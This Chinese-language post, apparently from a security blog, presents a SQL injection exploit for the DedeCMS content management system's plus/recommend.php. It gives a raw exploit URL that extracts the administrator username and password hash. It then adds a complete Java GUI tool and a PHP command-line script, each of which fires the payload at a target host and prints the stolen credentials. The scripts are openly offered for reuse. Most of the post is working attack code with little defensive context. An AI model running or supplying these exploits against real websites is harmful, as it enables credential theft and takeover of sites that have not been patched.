DedeCMS全版别通杀SQL注入漏洞使用代码及工具
dedecms即织梦(PHP开源网站内容管理体系)。织梦内容管理体系(DedeCms) 以简略、有用、开源而出名,是国内最知名的PHP开源网站管理体系,也是运用用户最多的PHP类CMS体系,近来,网友在dedecms中发现了全版本通杀的SQL注入漏洞,当前官方最新版已修正该漏洞,有关利用代码如下:
EXP:
Exp:plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\' or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin` limit+0,1),5,6,7,8,9%23@`\'`+&_FILES[type][name]=1.jpg&_FILES[type] [type]=application/octet-stream&_FILES[type][size]=111
工具源码(by 园长):
package org.javaweb.dede.ui;
import java.awt.Toolkit;
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.net.URL;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
/**
*
* @author yz
*/
public class MainFrame extends javax.swing.JFrame {
private static final long serialVersionUID = 1L;
/**
* Creates new form MainFrame
*/
public MainFrame() {
initComponents();
}
public String request(String url){
String str = "",tmp;
try {
BufferedReader br = new BufferedReader(new InputStreamReader(new URL(url).openStream()));
while((tmp=br.readLine())!=null){
str+=tmp+"\r\n";
}
} catch (Exception e) {
jTextArea1.setText(e.toString());
}
return str;
}
private void initComponents() {
jPanel1 = new javax.swing.JPanel();
jLabel1 = new javax.swing.JLabel();
jTextField1 = new javax.swing.JTextField();
jButton1 = new javax.swing.JButton();
jScrollPane1 = new javax.swing.JScrollPane();
jTextArea1 = new javax.swing.JTextArea();
setDefaultCloseOperation(javax.swing.WindowConstants.EXIT_ON_CLOSE);
jLabel1.setText("URL:");
jTextField1.setText("http://localhost");
this.setTitle("DedeCms recommend.php注入利用工具-p2j.cn");
int screenWidth = Toolkit.getDefaultToolkit().getScreenSize().width;
int screenHeight = Toolkit.getDefaultToolkit().getScreenSize().height;
this.setBounds(screenWidth / 2 - 229, screenHeight / 2 - 158, 458, 316);
jButton1.setText("获取");
jButton1.addActionListener(new java.awt.event.ActionListener() {
public void actionPerformed(java.awt.event.ActionEvent evt) {
jButton1ActionPerformed(evt);
}
});
jTextArea1.setColumns(20);
jTextArea1.setRows(5);
jScrollPane1.setViewportView(jTextArea1);
javax.swing.GroupLayout jPanel1Layout = new javax.swing.GroupLayout(jPanel1);
jPanel1.setLayout(jPanel1Layout);
jPanel1Layout.setHorizontalGroup(
jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addGroup(jPanel1Layout.createSequentialGroup()
.addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.TRAILING, false)
.addComponent(jScrollPane1, javax.swing.GroupLayout.Alignment.LEADING)
.addGroup(javax.swing.GroupLayout.Alignment.LEADING, jPanel1Layout.createSequentialGroup()
.addContainerGap()
.addComponent(jLabel1)
.addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
.addComponent(jTextField1, javax.swing.GroupLayout.PREFERRED_SIZE, 331, javax.swing.GroupLayout.PREFERRED_SIZE)
.addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
.addComponent(jButton1, javax.swing.GroupLayout.PREFERRED_SIZE, 83, javax.swing.GroupLayout.PREFERRED_SIZE)))
.addGap(0, 0, Short.MAX_VALUE))
);
jPanel1Layout.setVerticalGroup(
jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addGroup(jPanel1Layout.createSequentialGroup()
.addContainerGap()
.addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)
.addComponent(jLabel1)
.addComponent(jTextField1,
javax.swing.GroupLayout.PREFERRED_SIZE,
javax.swing.GroupLayout.DEFAULT_SIZE,
javax.swing.GroupLayout.PREFERRED_SIZE)
.addComponent(jButton1))
.addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)
.addComponent(jScrollPane1, javax.swing.GroupLayout.DEFAULT_SIZE, 254, Short.MAX_VALUE))
);
javax.swing.GroupLayout layout = new javax.swing.GroupLayout(getContentPane());
getContentPane().setLayout(layout);
layout.setHorizontalGroup(
layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addComponent(jPanel1, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
);
layout.setVerticalGroup(
layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)
.addComponent(jPanel1, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)
);
pack();
}// </editor-fold>
private void jButton1ActionPerformed(java.awt.event.ActionEvent evt) {
String url = jTextField1.getText();
if(null==url||"".equals(url)){
return ;
}
String result = request(url+"/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294");
Matcher m = Pattern.compile("<h2>(.*)</h2>").matcher(result);
if(m.find()){
String[] s = m.group(1).split("\\|");
if(s.length>2){
jTextArea1.setText("UserName:"+s[1]+"\r\nMD5:"+s[2].substring(3,s[2].length()-1));
}
}
}
public static void main(String args[]) {
java.awt.EventQueue.invokeLater(new Runnable() {
public void run() {
new MainFrame().setVisible(true);
}
});
}
// Variables declaration - do not modify
private javax.swing.JButton jButton1;
private javax.swing.JLabel jLabel1;
private javax.swing.JPanel jPanel1;
private javax.swing.JScrollPane jScrollPane1;
private javax.swing.JTextArea jTextArea1;
private javax.swing.JTextField jTextField1;
// End of variables declaration
}
拿园长的工具来改改,改成PHP版的,喜欢的拿去。。。
<?php
02
/**
03
* Created by 独自等待
04
* Date: 14-3-3
05
* Time: 下午12:58
06
* Name: dede_recommend.php
07
* 独自等待博客:http://www.waitalone.cn/
08
*/
09
print_r('
10
+------------------------------------------------------+
11
DedeCMS recommend.php 注入EXP
12
Site:http://www.waitalone.cn/
13
Exploit BY: 独自等待
14
Time:2014-03-03
15
+------------------------------------------------------+
16
');
17
if ($argc < 3) {
18
print_r('
19
+------------------------------------------------------+
20
Useage: php ' . $argv[0] . ' host path
21
Host: target server (ip/hostname)
22
Path: path of dedecms
23
Example: php ' . $argv[0] . ' localhost /dedecms
24
+------------------------------------------------------+
25
');
26
exit;
27
}
28
error_reporting(7);
29
$host = $argv[1];
30
$path = $argv[2];
31
$url = "http://$host/$path/plus/recommend.php";
32
echo '管理员密码获取中,请稍候……' . PHP_EOL;
33
if (@fopen($url, 'r')) {
34
$exp = "$url?action=&aid=1&_FILES[type][tmp_name]=\\%27%20or%20mid=@%60\\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60%20limit+0,1%29,5,6,7,8,9%23@%60\\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294";
35
$info = @file_get_contents($exp);
36
if (preg_match('/\|(.*?)\|(.*?)<\/h2>/', $info, $match)) {
37
echo '========================================' . PHP_EOL;
38
echo '用户名:' . $match[1] . ' 密码:' . substr($match[2], 3, 16) . PHP_EOL;
39
echo '========================================' . PHP_EOL;
40
} else {
41
echo '未知错误,请手工尝试!' . PHP_EOL;
42
}
43
} else {
44
echo '报告大爷,网站不存在此漏洞!' . PHP_EOL;
45
}
46
//统计时间
47
$start_time = func_time();
48
//时间统计函数
49
function func_time()
50
{
51
list($microsec, $sec) = explode(' ', microtime());
52
return $microsec + $sec;
53
}
54
55
echo '脚本执行时间:' . round((func_time() - $start_time), 4) . '秒';
56
?>
效果如下:
参考网站:
http://0day5.com/archives/1349
http://p2j.cn/?p=798